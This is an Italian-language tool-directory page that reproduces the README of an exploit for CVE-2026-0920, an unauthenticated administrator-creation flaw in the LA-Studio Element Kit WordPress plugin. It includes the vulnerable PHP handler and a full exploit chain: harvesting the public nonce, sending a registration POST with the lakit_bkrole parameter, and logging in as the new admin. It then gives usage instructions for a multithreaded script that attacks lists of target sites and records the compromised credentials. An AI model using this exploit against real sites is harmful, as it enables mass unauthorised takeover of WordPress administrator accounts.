Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/nxploited/cve-2026-0920-
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebApprendimento e Formazione
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit per Elementor <= 1.5.6.3 - Escalation dei privilegi non autenticata tramite backdoor per la creazione di utenti amministrativi tramite il parametro lakit_bkrole

Vedi Repository
2175 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalation dei privilegi non autenticata tramite backdoor per la creazione di utenti amministrativi tramite il parametro lakit_bkrole

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 L'exploit arriva qui per primo. Segui @KNxploited su Telegram — il tuo feed d'élite per CVE appena divulgate, PoC funzionanti e ricerca sulla sicurezza di precisione. Aggiornato senza sosta. Creato per chi vuole restare avanti.


🧠 Panoramica

CVE-2026-0920 è una vulnerabilità CVSS 9.8 Critical scoperta nel plugin WordPress LA-Studio Element Kit for Elementor.

Il difetto risiede nella funzione ajax_register_handle(), che elabora le registrazioni utente non autenticate tramite AJAX. La funzione non impone alcuna restrizione sul parametro lakit_bkrole — consentendo a un attaccante completamente non autenticato di auto-assegnarsi il ruolo administrator durante la registrazione, ottenendo il pieno controllo dell'account admin di WordPress in una singola richiesta.

CampoDettagli
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versioni interessateTutte le versioni fino alla 1.5.6.3 inclusa
Tipo di vulnerabilitàEscalation dei privilegi non autenticata / Creazione admin
Vettore d'attaccoRete — Nessuna autenticazione richiesta
Punteggio CVSS 3.19.8 CRITICAL
Vettore CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpattoPieno controllo dell'account amministratore WordPress
RicercatoreNxploited

💀 Analisi approfondita della vulnerabilità

La causa principale è la mancanza di un controllo delle capability del ruolo all'interno del gestore di registrazione AJAX del plugin:

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Perché è critico:

  • wp_ajax_nopriv_* = accessibile da chiunque senza alcuna autenticazione
  • lakit_bkrole accetta qualsiasi stringa di ruolo WordPress — incluso administrator
  • Una singola richiesta POST crea un account admin con pieni privilegi
  • Il nonce richiesto è esposto pubblicamente nell'HTML/JS del front-end del sito
  • Nessun rate limiting, nessun CAPTCHA applicato di default, nessuna verifica email richiesta

⚔️ Catena di exploit

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requisiti

pip install requests colorama
DipendenzaScopo
requestsRichieste HTTP, gestione della sessione, gestione dei cookie
coloramaOutput terminale colorato su tutte le piattaforme
threadingElaborazione concorrente di più target
reEstrazione del nonce tramite regex da HTML/JS

Consigliato Python 3.10+ (usa i type hint con unione str | None).


📂 Struttura dei file

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Utilizzo

Step 1 — Configura le credenziali (Opzionale)

Apri CVE-2026-0920.py e modifica le costanti in cima per impostare i dettagli desiderati dell'account admin:

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Step 2 — Prepara i target

Crea list.txt con un URL target per riga:

https://target1.com
https://target2.com
http://target3.com

Gli URL senza schema vengono automaticamente preceduti da https://.


Step 3 — Esegui l'exploit

python CVE-2026-0920.py

Ti verrà chiesto:

Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Step 4 — Monitora l'output in tempo reale

Lo script produce un output terminale in tempo reale e codificato a colori:

Scarica lo strumento